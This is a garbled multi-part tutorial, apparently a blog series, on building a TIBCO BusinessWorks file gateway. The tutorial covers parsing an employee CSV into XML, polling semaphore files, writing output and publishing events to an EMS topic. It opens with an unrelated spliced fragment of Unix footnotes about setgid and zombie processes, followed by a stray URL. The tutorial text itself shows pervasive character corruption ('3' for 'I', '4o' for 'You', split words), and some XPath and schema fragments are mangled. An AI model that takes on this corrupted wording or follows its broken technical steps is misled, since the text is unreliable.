TC shells. [3] To remove zombie processes, the system must be rebooted. [4] The setgid permission is system-dependent in its use. On some systems, a setgid on a directory may cause files created in that directory to belong to the same group that is owned by the directory. On others, the EGID of the process determines the group that can use the file. [5] The caller's EUID must match the owner's UID of the file, or the owner must be superuser. [6] See built-in commands, limit and ulimit.
https://flylib.com/books/en/4.358.1.6/1/
CC-MAIN-2021-49
refinedweb
7,015
71.04
Hey, Scripting Guy! I know this may sound like a strange question, but I would like to create a graphical user interface for a Windows PowerShell script. I could do these kinds of things using a HTML Application (HTA) file, but I like writing Windows PowerShell scripts. If I could use some sort of functionality that would create a drop-down list that would allow a user to select a specific item from the list, it would be great. Or do I need to continue creating HTAs if I want a graphical user interface? I guess I could figure out a way to run Windows PowerShell code from inside my HTA. Let me know. — MC Hello MC, Microsoft Scripting Guy Ed Wilson here. Graphical user interface (GUI) is not something I have been a big fan of in the IT pro/scripting world. I have always figured that if I needed a GUI, I would use Visual Studio and write either a VB.NET or a C# application. Visual Studio makes it so easy to do this; it hardly seems worth the effort to write HTML code by hand. With the advent of the free versions of VB.NET and Visual C#, there is no need for cost justification for the IT pro who wants to start using developer tools. The step from VBScript to VB.NET or from Windows PowerShell to C# is not a very big one. The big commitment, of course, is the time investment it takes to learn the new tools. From having worked with thousands of IT pros in the last few years, I do know that there are some legitimate reasons for creating GUIs, and the HTA has been a faithful servant in that arena. Unfortunately, I have always found them to be an overly complex technology and a horribly documented one at that. If it were not for the few Hey, Scripting Guy! articles and the HTA Helpomatic (available from our home page), there would be almost no help for HTAs. Here is an example of an HTA that creates a drop-down list and populates it with items from a text file. A similar HTA is discussed in the Hey, Scripting Guy! article, How Can I Load a Drop-Down List from a Text File? DisplayListBox.hta <head> <!– ‘******************************************************************** ‘* ‘* File: DisplayListBox.hta ‘* Author: Ed Wilson ‘* Created: 8/21/2009 ‘* Version: 1.0 ‘* ‘* Description: Reads a text file, and creates a list box ‘* ‘* Dependencies: You must modify path to the text file ‘* HSG-08-31-09 ‘******************************************************************** –> <title>HTA List Box</title> <HTA:APPLICATION ID=”ListBox” APPLICATIONNAME=”HTAListBox” SCROLL=”yes” SINGLEINSTANCE=”yes” > </head> <SCRIPT LANGUAGE=”VBScript”> Sub Window_Onload LoadListBox End Sub Sub LoadListBox ForReading = 1 strNewFile = “c:FSOItemList.txt” Set objFSO = CreateObject(“Scripting.FileSystemObject”) Set objFile = objFSO.OpenTextFile _ (strNewFile, ForReading) strItems = objFile.ReadAll objFile.Close arrItems = Split(strItems,vbNewLine) For Each stritem in arrItems Set objOption = Document.createElement(“OPTION”) objOption.Text = strItem objOption.Value = strItem Items.Add(objOption) End Sub </SCRIPT> <body> <select name=”Items”> </body> When the DisplayListBox.hta script is run, this GUI is displayed: The ItemList.txt file is not anything special. It is a list of item names as seen here: I created the ItemList.txt text file in Explorer, and was getting ready to add some content to the list. Then I realized, this is dumb, I am the Scripting Guy … I know how to write scripts. Therefore, I created the contents of the item list text file by typing the command seen here at a Windows PowerShell prompt. PS C:> 1..20 | ForEach-Object { Add-Content C:fsoItemList.txt “Item$_” } The Get-ListBoxFunction.ps1 script contains most of the code in a function called Get-ListBox. I could have called the function New-ListBox and thought about it pretty hard. However, when I looked at Windows PowerShell cmdlets that used the new verb, it did not seem to match up too well, so in the end I decided to call it Get-ListBox. Function names should conform to the Verb-Noun pattern in Windows PowerShell 2.0, or they will generate warning messages when placed into modules. It is a good idea to get in the habit of thinking about proper function names now. The first thing you must do is load the assembly that contains the various graphical classes we want to use. To do this you use the LoadWithPartialName static method from the System.Reflection.Assembly class. In Windows PowerShell 2.0, this is easier because you can use the Add-Type cmdlet to do this for you. Because you do not want to be distracted with the confirmation message from calling the method, you pipe the results to the Out-Null cmdlet. This is seen here: [System.Reflection.Assembly]::LoadWithPartialName(“System.windows.forms”) | out-null You next need to create an instance of a Windows form. The Form class resides in the System.Windows.Forms namespace and is documented on MSDN. Because the System is the root namespace and is prepended automatically to the classes, you can leave it off when you create the class. You then assign a title for the Windows form of “ListBox Control” by assigning a value for the text property. This is seen here: $WinForm = new-object Windows.Forms.Form $WinForm.text = “ListBox Control” The size of the form is specified as an instance of a Drawing.Size structure. You need to create an instance of the Drawing.Size structure, and specify the height and the width of the form. The Drawing.Size structure is documented on MSDN. One way to get the Drawing.Size dimensions is to draw the form in Visual Studio and look at the code behind the picture. You can also run the code and experiment with the sizes until you obtain a size that works for your particular application: $WinForm.Size = new-object Drawing.Size(200,125) Once you have a form and a size for the form, you need to create a list box. The list box is an instance of the ListBox class that is found in the Windows.Forms namespace. It is documented on MSDN and has a number of methods and properties: $ListBox = new-object Windows.Forms.ListBox You now need to add the controls to the Form. To do this, you use the controls.add method. Each item is added by using the items collection from the list box, and calling the add method. The Get-Content cmdlet is used to read the contents of the text file. Because you do not want to see the feedback from adding the item to the list box we pipeline the results to the Out-Null cmdlet. This is seen here. $winform.controls.add($listbox) ForEach($i in (Get-Content c:fsoitemlist.txt)) { $ListBox.items.add($i) | Out-Null } The last thing you need to do is to activate the Form and show the dialog. This is seen here. $WinForm.Add_Shown($WinForm.Activate()) $WinForm.showdialog() | out-null When you select an item from the list box, it is assigned to the SelectedItem property of the ListBox class. The function returns this to the calling code. This is seen here. $ListBox.SelectedItem } #end function Get-ListBox The entry point to the script calls the Get-ListBox function. It does not pass any values to it; however, one improvement would be to modify the function to accept the path to the items it will use to populate the list box. This is seen here. # *** Entry Point to Script *** Get-ListBox The complete Get-ListBoxFunction.ps1 script is seen here. Get-ListBoxFunction.ps1 # ————————————————————————- # Get-ListBoxFunction.ps1 # ed wilson, msft, 8/20/2009 # # Keywords: .NET Framework, Reflection, windows.Forms, # graphical,gui # # HSG-08-31-09 # MSDN documentation for Listbox : # ———————————————————————— Function Get-ListBox { [System.Reflection.Assembly]::LoadWithPartialName(“System.windows.forms”) | out-null $WinForm = new-object Windows.Forms.Form $WinForm.text = “ListBox Control” $WinForm.Size = new-object Drawing.Size(200,125) $ListBox = new-object Windows.Forms.ListBox $winform.controls.add($listbox) ForEach($i in (Get-Content c:fsoitemlist.txt)) { $ListBox.items.add($i) | Out-Null } $WinForm.Add_Shown($WinForm.Activate()) $WinForm.showdialog() | out-null $ListBox.SelectedItem } #end function Get-ListBox # *** Entry Point to Script *** Get-ListBox When the script is run, the Windows form seen here is created: MC, thanks for asking a cool question. It has been quite some time since I wrote an HTA. The last one was about 10 months ago when I created one to do temperature conversions. We used your question to kick off graphical scripting week, as we answer some of the graphical scripting questions we have been getting. Join us next week as graphical Windows PowerShell week continues. Tomorrow we will be looking at … wait you will need to follow us on Twitter or Facebook for that information. If you have any questions, shoot us an e-mail at scripter@microsoft.com or post it to the Official Scripting Guys Forum. See you tomorrow. Until then, peace! Ed Wilson and Craig Liebendorfer, Scripting Guys You really didn’t answer the question asked… You sidestepped it and answered a different question. This does not help at all, did you read the question?
https://blogs.technet.microsoft.com/heyscriptingguy/2009/08/31/hey-scripting-guy-can-i-create-a-gui-for-a-windows-powershell-script/
CC-MAIN-2017-22
refinedweb
1,529
67.35
A constructor can be thought of as a specialized method of a class that creates (instantiates) an instance of the class and performs any initialization tasks needed for that instantiation. The sytnax for a constructor is similar but not identical to a normal method and adheres to the following rules: - The name of the constructor must be exactly the same as the class it is in. - Constructors may be private, protected or public. - A constructor cannot have a return type (even void). This is what distinguishes a constructor from a method. A typical beginner's mistake is to give the constructor a return type and then spend hours trying to figure out why Java isn't calling the constructor when an object is instantiated. - Multiple constructors may exist, but they must have different signatures, i.e. different numbers and/or types of input parameters. - The existence of any programmer-defined constructor will eliminate the automatically generated, no parameter, default constructor. If part of your code requires a no parameter constructor and you wish to add a parameterized constructor, be sure to add another, no-parameter constructor. Example public Person { private String name; public Person(String name) { _name = name; } } The above code defines a public class called Person with a public constructor that initializes the _name field. To use a constructor to instantiate an instance of a class, we use the new keyword combined with an invocation of the constructor, which is simply its name and input parameters. new tells the Java runtime engine to create a new object based on the specified class and constructor. If the constructor takes input parameters, they are specified just as in any method. If the resultant object instance is to be referenced by a variable, then the type of the newly created object must be of the same type as the variable. (Note that the converse is not necessarily true!). Also, note that an object instance does not have to be assigned to a variable to be used. Example Person me = new Person("Stephen"); The above code instantiates a new Person object where _namefield has the value "Stephen". - 904 reads
http://www.opentextbooks.org.hk/node/8266
CC-MAIN-2020-40
refinedweb
356
51.89
Bug #7303 Logger fails on log rotation in Windows (log shifting failed. Permission denied) Description I have the problem that the logger fails in rotating the log file (daily) with Ruby 1.9.3 in Windows 7. The cause is, that the log file is open and shall be renamed. This results in an error "log shifting failed. Permission denied". Log rotating will work, if the log file is copied to the age_file and then the logfile is cleaned by using logdev.truncate(0). My changes to logger.rb are (remove 3 lines, add 2 lines): def shift_log_period(period_end) postfix = period_end.strftime("%Y%m%d")# YYYYMMDD age_file = "#{@filename}.#{postfix}" if FileTest.exist?(age_file) # try to avoid filename crash caused by Timestamp change. idx = 0 # .99 can be overridden; avoid too much file search with 'loop do' while idx < 100 idx += 1 age_file = "#{@filename}.#{postfix}.#{idx}" break unless FileTest.exist?(age_file) end end - @dev.close rescue nil - File.rename("#{@filename}", age_file) - @dev = create_logfile(@filename) - FileUtils.cp(@filename, age_file) - reset_logfile(@dev) # see below for this new method return true I've added a new method to clean the open logfile and add a log header: def reset_logfile(logdev) logdev.truncate( 0 ) logdev.sync = true add_log_header(logdev) end The change above (copy/clean instead of rename) should also be applied to the method "shift_log_age", same problem here. I don't know how to bring this code into standard ruby sources. Please somebody change the code, so the bug will be fixed. (I found this bug also described in the old RubyForge archive:) History #1 Updated by Herman Munster over 1 year ago Addition to my previous post: require 'fileutils' is needed at the beginning of logger.rb, if using FileUtils.cp(). #2 Updated by Usaku NAKAMURA about 1 year ago - Status changed from Open to Assigned Also available in: Atom PDF
https://bugs.ruby-lang.org/issues/7303
CC-MAIN-2014-10
refinedweb
308
68.26
02JAN 4 Votes RE I!IO" #$1% Change 1: The following changes have been made to the ParseAndTransform process. - Add 2 o tp t parameter to the process. The! are config red as the inp t parameter of the "#nd$ activit! of the process. % empColl & This element contains a cop! of the empAcc m lator process variable % o tp t'ile(ame & This element contains the o tp t filename to be sed b! the downstream file writer activit!. The reason behind this design decision is that when a new data model o tp t is re) ired* a new s b-process will be created b! the developer and deplo!ed into the +, engine. -ifferent ParseAndTransfor process responsible to prod ce different data model based on different .sd will ca se a different /01 file name to be written b! the downstream writer activit!. #.ample: ParseAndTransform s b-process will have its o tp t writen to a file called Cons mer///2ni) e3-..ml. ParseAndTransform will have its o tp t written to a file called Cons mer4442ni) e3-..ml. These o tp t filename will event all! be p blished to interested parties. Change 2: #mplo!ee-ata'ormat 5-ata 'ormat6 has been pdated to contain "Comple. #lement$ rather than "/01 #lement 7eference$ to demonstrate the difference between the data model of the original inp t file and the desired o t file 5emplo!ees .sd6. The -ata 'ormat defines the C8V file to contain the following fields lastname*fistname*emp( m*hire-ate*department*manager 9999999999999999999999+een b s! with wor: and done heaps of catch p with the T3+C; 8;A platform. Came bac: from the T3+C; (;, seminar in 0elbo rne and got a good pict re of what to e.pect from T3+C; prod ct roadmap. 3 have to sa! T3+C;$s platform is nimble. The! reall! :now how to do integration and have learned a lot from their c stomers in specific verticals. + t that is from a helicopter view. ;<* let$s start. This article is a part of the series of articles target to describe cr de "reference implementation$ of 'ile =atewa! pattern in the boo: >8;A -esign Patterns? b! Thomas #rl. This article e.plains the steps to create a file gatewa! that perform the following tas:s. 16 A legac! s!stem writes a batch flat-file into an inbo nd folder 26 The parser-transformer component polls and retrieve the flat file @6 The parser-transformer parses the data and performs data format transformation 46 The parser-transformer optionall! performs data model transformation A6 The parser-transformer writes file to an o tbo nd folder B6 The parser-transformer optionall! broadcastsCtriggers an event that a file is read! for cons mption To help !o vis alise what we are abo t to b ild* refer to this end-state. The final product - e to the width and depth covered in this topic* this article is split into 4 parts. The first part tal:s abo t how to create a T3+C;-+, process definition to parse and transform data models. 3n the second part we will be e.tending the parser-transformer process to write the res ltant file into the o tbo nd folder. ,e will also implement fo r more global variables to enable config ration of inbo nd file path* o tbo nd file path* semaphore file e.tension as well as the file pattern to watch. The third part of this article will describe the steps to create a simple file poller process and invocation of the parser-transformer process. The fo rth part of this article will loo: at testing and deplo!ment of this gatewa! into the T3+C; +, infrastr ct re* some performance t ning and monitoring sing T3+C; Daw: agents. 3n the roadmap* one wo ld hope to haveCbe able to interact with the following capabilities: 16 P blish transformation completion events to the interested parties 5t!picall! the cons mers* can also be the legac! providers provided the! are capable of listening to events6 26 Pl ggable architect re of schema specific parsersCtransformation engines* effectivel! s pporting one so rce m ltiple target se. @6 1oad balancing via T3+C; infrastr ct res 46 8ervice call-bac: 5pattern6 A6 Protocol bridging 5pattern6 B6 8chema Centralisation 5pattern6 ,e will disc ss the appropriateness of item 4* A E B when time permits. The writing of this article is nrehearsed. 3t ma! and will contain errors and inacc racies* both technicall! and organisationall!. 4o r comments and corrections are ver! welcomed. Dere goes the first part. +egin with the ends in mindFhere is what we will get at the end of this article. 16 Create the following folders str ct re in the file s!stem. This file s!stem is a location to e.change inbo nd and o tbo nd files. 3t can be a folder in an ftp server or a mappable folder on the (A8. The inbo nd folder is for incoming files* s all! file d mps performed b! the legac! s!stem. Corresponding semaphore files will also transientl! e.ist in this folder. The o tbo nd folder* on the other hand* holds the parsed and transformed files for the targeted cons mers. 26 Create a /01 schema that defines the data str ct re to be handled b! the parserCtransformer process. ,e created the schema sing ;racle G-eveloper* based on the #0P table from the 8C;TT schema. 3 have to admit that this tool* li:e man! other commercial /01 tools* provides better ser e. -esigner proHect. . -esigner. 1a nch the T3+C. Create a new empt! proHect* name it as 'ile=atewa!.perience thro gh the adoption of widel! accepted vis al paradigm. @6 Create a new T3+C. 7ename the folder to "ParseAndTransform$ directl! in the Config ration Panel. -esigner* select the "(ew 'older$ men item* and a new folder with a defa lt name "'older$ will be added. .46 Create a new folder to contain o r + siness.or:s process. To create a new folder* right clic: on the root node in the ProHect Panel of the T3+C. (otabl! in the definition of -ata 'ormat* Parse -ata and other activities.pected from this process. To import the schema we have created in 8tep 2* ma:e s re the ParseAndTransform folder is selected.A6 3mport the schema of the data model o tp t e. 2nder the ProHect men * select "3mport 7eso rces from 'ile* 'older* 271F$. . This schema will be referenced m ltiple times thro gho t the entire process definition. I6$ as the 'ormat.3n the "3mport 7eso rce of 'ileF$ dialog e bo.sd..slt* .* select the "'ile 5.. .wsdl* . 3n the "'ile:$ field* clic: on the binoc lar icon to browse for !o r schema file. r file is named emplo!ees. 4o sho ld now have a schema appearing on the -esigner Panel. .sd* .. -o ble-clic: the schema icon* !o can inspect the schema thro gh T3+C. Clic: the ".verview$ b tton on top to see the schema overview. -esigner$s schema editor.e are not going to ma:e an! changes thro gh this editor thro gho t this proHect. . . G st as one wo ld do when importing a C8V file into 08 #. This step involve the process of defining an activit! call "-ata 'ormat$. r parser will need to :now how to parse the C8V.cel* we will define the format* the delimiter character* the #.1 character and other characteristic of the inp t flat file. +ac: to the ParseAndTransform folder* in the -esigner Panel* right-clic: and select "Add 7eso rce$ J Parse J "-ata 'ormat$ s b-men item.B6 . . 7ename the activit! to "#mplo!ee-ata'ormat$ and clic: "Appl!$. . #lement$. 7ename it to "emp$. Clic: on the "K$ b tton* a defa lt "root$ element will be added. .3n the config ration panel* clic: on the "-ata 'ormat$ tab* we will specif! the content t!pe as "Comple. -efine the children elements as shown in the pict re below. Created an empt! T3+C. -esigner proHect called 'ile=atewa!.Clic: the "Appl!$ b tton to commit !o r changes. . . 3n the ne. .e called that schema "emplo!ees.Parses the inbo nd file 5Parse -ata activit!6 .sd$ schema into the ParseAndTransform folder .2pdates a process variable that acts as acc m lator 5Assign activit!6 .sd$.Created a -ata 'ormat that references the emplo!ees. . 3t contains 2 comple.ternal process.t step we will create a process definition that will perform the following tas:s.Ta:es an inp t that contains filename information from an e.e have . .Create a new folder called ParseAndTransform in the 'ile=atewa! proHect..Created a /01 schema sing o r preferred /01 a thoring tool.Constr cts the emplo!ees collection from the parsed records 50apper activit!6 .3mported the "emplo!ees. . +efore we process f rther* let$s loo: at what we have done. ..sd* we called this -ata 'ormat "#mplo!ee-ata'ormat$. t!pes and 2 elements.. Clic: on the ParseAndTransform node on the ProHect Panel. .Config rable n mber of records to be gro ped for reso rce optimisationCt ning L6 Add a new process nder the ParseAndTransform folder. 7ename the process definition to "ParseAndTransform$ directl! in the Config ration Panel.ne the -esigner Panel* right clic: and select the Process J Process -efinition s b-men item.This process definition will be b ilt with the following capabilities: . A new process definition with a defa lt name "Process -efinition$ will be added. . -efine a process variable to act as an acc m lator of emplo!ee records. . . 3n this step* we need to specif! the inp t parameter* and we will define this at the "8tart$ activit! of the process definition. -o ble clic: on the ParseAndTransform process definition icon in the -esigner Panel.M6 2p to this stage* we have an empt! process definition. This process will not poll the file s!stem* the polling part will be performed b! the parent process* or even a separate component* depends on o r designN instead* this process ta:es an inp t that specifies the f ll! ) alified filename to be parsed. Clic: the "abc$ icon at the bottom of the =lobal Variables pop. O6 -efine a global variable called CD2(<P83Q# of t!pe integer.p window and name that variable as "CD2(<P83Q#$ of t!pe 3nteger. . This val e of this variable can be config red in the T3+C. This "o tp t$ parameter will appear as "inp t$ parameter when the entire process is reference from another activit! or process. (ote: This tab is called ". To define a global variable* clic: on the =lobal Variables panel. tp t #ditor$ tab and name that parameter as "inbo nd'ile(ame$.e will see how this wor:s in the coming steps. This variable will be referenced in the "=ro p$ for gro ping of records for processing. Assign it a defa lt val e of "@$. . Clic: the "K$ sign nder the ". tp t #ditor$ beca se it allows one to specif! the o tp t that will be available to all downstream activities. Clic: the "Appl!$ b tton to ma:e the changes effective. Clic: on the pencil icon to open the Advanced #ditor. tp t #ditor$ tab.Clic: on the "8tart$ activit! icon* in the Config ration Panel* clic: on the ". 8pecif! the Content as "#lement of T!pe$ and the T!pe as "8tring$. Administrator console d ring the deplo!ment and possibl! wo ld be sef l for performance t rning. e shall see the newl! created variable appear in the =lobal Variables list together with other pre-defined variables. . Add the "Parse -ata$ activit!.. -o ble clic: on the ParseAndTransform process definition* in the -esigner Panel* right-clic: on the white space area to insert a Parse -ata activit!. 1R6 Add the necessar! activities into the process definition. . 3n the config ration tab of config ration panel for Parse#mpsC8V activit!* clic: on the binoc lar icon to select the -ata 'ormat created earlier.7ename the Parse -ata activit! to "Parse#mpsC8V$. Clic: . 7ight clic: on the "8tart$ activit! to select "Create 8ingle Transition$ men item.hen bac: to the config ration tab* ens re the "3np t T!pe$ field is specified as "'ile$. Clic: "Appl!$ and save the proHect. (ote that the c rsor pointer changes to a hairline "K$. . 116 .ire the "8tart$ and "Parse#mpsC8V$ activities together. .<. .-rag a line from "8tart$ to "Parse#mpsC8V$ activities to represent the direction of the transition. At this stage* there is no config ration re) ired for this transition line. Clic: on the Parse#mpsC8V activit! to contin e wor:ing on it. . 3n the config ration tab* clic: on the binoc lar icon to pic: the re) ired -ata 'ormat. Clic: .. 3n the 3np t T!pe* select "'ile$ from the dropdown bo.<. . Two val es are re) ired. . The second inp t* no.f7ecords* will be mapped to the CD2(<P83Q# defined as the process variable earlier. The first one* is the filename which will be mapped to the "inbo nd'ile(ame$ of the 8tart activit!.Clic: on the inp t tab* map the inp t fields with the re) ired process data. #nter a literal 0 into the 8:ipDeaderCharacters field as o t C8V file starts from the first col mn. The ne.t activit! in the process will be the 0apper activit!. This activit! in o r process will perform 2 f nctions. 'irst* it acts as a mapper to map the o tp t of the Parse -ata activit! into the final form. The second f nction which is e) all! important is that it will perform the "acc m lation$ of the emplo!ee records in ever! iteration of the gro p 5will be disc ssed later6 it operates in. 126 Add a 0apper activit!* name it as + ild#mpsColl. 7ight clic: on the -esigner Panel to add a 0apper activit! located nder "=eneral Activities$ men . Create a transition from Parse#mpsC8V into + ild#mpsColl. 3n the inp t editor tab* define the inp t parameter that this activit! will ta:e. 3n the inp t tab* we need to map 2 inp ts from the process data into one emplo!ee collection. ;ne of the process data is the o tp t of Parse#mpsC8V activit!* the other is the empAcc m lator process variable. Parsed res lt from ever! iteration will be acc m lated in empAcc m lator process variable. 7ight clic: on the emp element in the Activit! 3np t pane and select "- plicate$ To map the process data* e.pand SempAcc m lator in the process data pane and drag the child node 5empColl6 into the first cop! of emp in the Activit! 3np t pane. 3n the dialog e bo.* select the "'or eachF$ option. .* select "0a:e a cop! of each "emp$$ 7epeat the same for the o tp t of Parse#mpsC8V activit!. 3n the dialog e bo. Clic: the "(e.e will need to man all! map the rest. This is beca se the so rce file 5flat file6 contain different data model and even the field name are not all the same. .t$ b tton. . (ote that onl! 2 fields are a tomaticall! mapped. amples. . (ow we need to pdate the acc m lator with this new val e. doc mentation for more details and e. 7efer to the T3+C. The o tp t file 5the . 3n the above e.e. first name and last name. 1@6 Add a "Assign$ activit! to the process.ample* the incoming C8V file contains 2 col mns for a name* i. . 3n the inp t tab* map the entire empColl into the process variable. This of co rse depends on the re) irement. Create the re) ired transition* incl ding the one that transition to the "#nd$ activit!. Assign activit! is nder the "=eneral Activities$ palette.0apper is a powerf l activit! that can perform man! transformation tas:s.e se the "Assign$ activit! for that. (ame the activit! "2pdateProcessVar$. The process variable to pdate is empAcc m lator.sd schema6 has onl! one element called ename* so we need to concat the fields into one. This approach is optional* b t will become visibl! important when the file siTe being processed is large* s ch as 1=+ or even 2=+. 8elect the activities that we want to gro p.e are getting there. .' character in the inp t file.it when the parser 5Parse#mpsC8V6 enco nters the #. The ne. name and se the following /Path e. 0 lti select can be performed b! holding down the control :e! while selecting.pression as the condition to stop the iteration. 8elect the created gro p* in the config ration tab* select "7epeat-2ntil-Tr e$ as the gro p action. Parse#mpsC8V* + ild#mpsColl and 2pdateProcessVar.t step is to wrap all the activities into a gro p so that iteration can be performed based on gro p of records. . $ParseEmpsCSV/Output/EOF = string((true())) The e. 2p to now* o r process definition loo:s li:e this. 146 =ro p the activities. #nter "i$ as the inde.. Clic: the "Create a gro p$ icon on the tool bar.pression will ca se the iteration to e. 1A6 Config re the gro p.hen as:ed* H st specif! >select "0a:e a cop! of each "empColl$?. . 4o can choose other name for this root schema* 3 wo ld H st accept the defa lt name "gro p$.1B6 -efine the process o tp t at the "#nd$ activit!. Clic: on the "#nd$ activit!. 3n the "3np t #ditor$ tab* add the following elements nder a defa lt root schema called "gro p$. This will be o t process o tp t.)) The first part of the o tp t filename is hardcoded for the sa:e of simplicit!. This is not critical as the filename convention is specific to this partic lar implementation of ParseAndTransform process. concat('EMP-OUT !-'" ti#$%ormat-&ateTime('''''MM&&-((-mm-ss'" current-&ateTime())")*+M. Paste the following /Path form la into the "o tp t'ile(ame$ element. This o tp t will be sed b! the downstream writer to create the /01 file. .3n the "3np t$ tab* drag the SempAcc m lator process variable into the empColl element in the Activit! 3np t pane. . +.ell* that is part 1. A TIBCO BusinessWorks-based file gateway – Part & 02JAN 2 Votes 3n the previo s article* we went thro gh the steps to create a T3+C... process that parses a flat C8V file and transforms the data format from C8V to /01. Along the process we also transformed the data model* concatenating the firstname and lastname fields into a single element specified in the emplo!ee.sd. tension: 3nbo nd8emaphore#.$6 8earch pattern: 3nbo nd8emaphorePattern 5defa lt to "I$6 8teps This article ass mes that !o alread! :new how to perform basic tas:s in T3+C. 'or now* the following are config rable: • • • • • 3nbo nd director!: -ir3nbo nd'older 5defa lt to "c:UfgwUinbo ndU$6 . -esigner.This article adds a file poller process with 7ender /01 activit! and sets p a few global variables for config rations.ir/n#oun&Fo0&er----/n#oun&Semap1orePattern---/n#oun&Semap1oreE2tSeparator----/n#oun&Semap1oreE2t-The global variable name s rro nded b! do ble V signs will be resolved d ring r n time. 16 Add a new folder nder the 'ile=atewa! root folder.tension separator: 3nbo nd8emaphore#. 46 Config re the 'ile Poller activit!. 26 Add a new process definition with a name Poll#mpsC8V @6 -o ble-clic: the newl! created process definition. tbo nd director!: -ir. tbo nd'older 5defa lt to "c:UfgwUo tbo ndU$6 8emaphore file e. (ote that the original "8tart$ activit! is now replaced b! the 'ile Poller activit!. Add a 'ile Poller activit! into the process. At the end of this article* we will have something li:e this. 3n the Config ration tab* paste the following string into the 'ile (ame field: --. 3n the Advanced tab: .t8eparator 5defa lt to ".t 5defa lt to "done$6 8emaphore e. hile the Poller activit! polls for the semaphore file* we will need to constr ct the filename re) ired. This parameter holds the f ll! ) alified name of the file to be parsed b! the parser.pand the ParseAndTransform folder in the ProHect Panel. This step ass mes that the semaphore file witho t the e. .mpCompletion activit!* ParseAndTransform process and the #nd activit! in the following order. .ire the Poll. Paste the following /Path form la into the form la pane.tension is the filename to be processed. -rag the "ParseAndTransform$ process into the Poll#mpsC8V process. ti#$su#string-#e%ore0ast($Po00.umpComp0etion/ns$E3entSourceOuput4oContentC0ass/%i0e/n%o /%u004ame"string- .A6 #. 3n the inp t tab of ParseAndTransform s b-process* clic: on the pencil icon to bring p the /Path editor. B6 An inp t parameter has alread! been defined earlier in the "8tart$ activit! of the ParseAndTransform process. The final process loo:s li:e this. Add a render /01 activit! followed b! a write file activit!.t There are different wa!s to implement semaphore. 7efer step 1@ of part 1 of this article. . L6 The ParseAndTransform s b-process provides 2 o tp t elements in its o tp t schema defined in its "#nd$ activit!.ceptions.t.t. 3f the semaphore filename is c:UfgwUinbo ndUempRR1. M6 'or the sa:e of simplicit!* add a "Catch$ activit! that catches all nhandled e. This is to avoid the process from reading an incomplete file. Another alternative is to rename the so rce file when the transferCfile creation b! the legac! s!stem has completed.t. The write file activit! will se the filename specified in the "o tp t'ile(ame$ element of the ParseAndTransform o tp t schema.0engt1($5g0o#a0Varia#0es/p%2$60o#a0Varia#0es//n#oun&Semap1oreE2tSep arator) 7 string0engt1($5g0o#a0Varia#0es/p%2$60o#a0Varia#0es//n#oun&Semap1oreE2t)) The above /Path form la ret rns the filename re) ired b! the Parse#mpsC8V activit! inside the s bprocess. 8emaphore is re) ired when writing large file that ta:es time to complete.done then the inp t filename to the parser activit! will be c:UfgwUinbo ndUempRR1. fro.BusinessWorks$ .A TIBCO BusinessWorks-based file gateway – Part ' 02JAN 1 Vote Publis(ing an e)ent to TIBCO E*! to+i. XC/8-:ATT73+2T#%XC/8-:C. The following se case describes the flow. X/8-:#1#0#(T nameY?file8iTe? t!peY?.0P1#/T4P#% 11.e have config red the T3+C. X/8-:8CD#0A . Dere is the completed schema. X/8-:ATT73+2T# nameY?t!pe? t!peY?. As s al* create the schema sing !o r favorite . X/8-:8#[2#(C#% 12.sd:string? seY?re) ired?% 2R.RZ encodingY?2T'-MZW% 2. XC/8-:#1#0#(T% 1M. X/8-:#1#0#(T nameY?file3nfo?% 4. The T3+C. X/8-:#1#0#(T nameY?file-ateTime? t!peY?. 'ile=atewa! p blishes event to '=. #08 to address part of this re) irement.sd:dateTime?% O. X/8-:ATT73+2T# nameY?name? seY?re) ired?% 1A..'31#7#A-4 topic.sd:int?% M. #nd of se case. XC/8-:#1#0#(T%XC/8-:#1#0#(T%XC/8-:#1#0#(T%XC/8-:8#[2#(C#% .0P1#/T4P#% A. Trigger: 'ile=atewa! finished writing the /01 file to the o tbo nd folder. X/8-:#1#0#(T nameY?transport?% 1R. 7efer to this article for details of setting p the topic* ser and access control list. view plaincop! to clipboardprintW 1.comCfilegwCfile3nfo? elementformdefa ltY?) alified?% @. X/8-:#1#0#(T nameY?file(ame? t!peY?. W(at we need A target topic .:ein. X/8-:ATT73+2T# nameY?val e? seY?re) ired?% 1B. 2.occ rsY? nbo nded?% 1@.:ein.0P1#/T4P#% 1L. XC/8-:ATT73+2T#%XC/8-:ATT73+2T#%XC/8-:C.ml versionY?1.e will loo: at the mechanism to p blish the file processing completion events from the 'ile=atewa!.comCfilegwCfile3nfo? targetnamespaceY?http:CCsoapla!gro nd. X/8-:C. XC/8-:8#[2#(C#% 1O.sdY?http:CC G08 P blish activit! will p blish the message according to this schema and the cons mer will reference this schema when parsing the message.mlns:fgwY?http:CCsoapla!gro nd. An .ml schema for event message This schema is sed b! both the prod cer and the cons mer of the event message.ml tool. X/8-:C.orgC2RR1C/018chema? . X/8-:8#[2#(C#% B. 'low: 1. + siness. X/8-:C.0P1#/T4P#% 21.w@.0P1#/T4P#% 14.mlns:.. XW. X/8-:#1#0#(T nameY?propert!? ma.sd:string?% L. XC/8-:#1#0#(T% 22. 2A. #08 server and clic: on the >Test Connection? b tton to ens re correct config ration.)9< 3mport the . XC/8-:C. • • Part 1 Part 2 A G08 P blish activit! in the + siness. Create a G08 Connection shared config ration. 24. 8tart the T3+C. 2nder the Poll#mpsC8V folder* create a G08 Connection.or:s process Dere are the steps to add a p blish G08 activit! into the process 1. 2nchec: the >2se G(-3 for Connection 'actor!? as o r cons mers will be connecting directl! witho t getting the reso rce handle from the G(-3. 3f !o haven$t been following the series of articles on 'ile=atewa!* !o can learn abo t the 'ile=atewa! in the following posts.2@. #nter the sername and password of the fgw ser. .0P1#/T4P#% XC/8-:#1#0#(T% XC/8-:8CD#0A% 892m0 3ersion=):* ) enco&ing=)UTF-.ml schema into the T3+C. -esigner proHect. rite/01'ile process data. .plicate the >propert!? element of the file3nfo instance to contain additional informations* s ch as the sername and password of the ftp server where the o tp t file is located* the rl of the ftp server and so forth. Create a transition from .ith P blish#vent activit! selected* go to the >3np t #ditor? tab. Add a G08 Topic P blisher activit!. . 3n the >0essage T!pe? dropdown* select >/01 Te.rite/01'ile to P blish#vent* and from P blish#vent to #nd activities. Clic: on the >K? icon and select >/01 #lement 7eference? from the >Content? dropdown. Possible val es are ftp* http* https or even a >7#8Tf l file server?W\.ercise\ .t* not an ideal implementation* b t that is a separate e. +rowse to the schema file3nfo. 3n the config ration tab* enter >'=.2.ell* the password is in plain-te.mpCompletion process* add a G08 Topic P blisher and name it as >P blish#vent?.sd and select the element >file3nfo? =o to the >3np t? tab* map the file(ame* file8iTe and file-ateTime elements of the 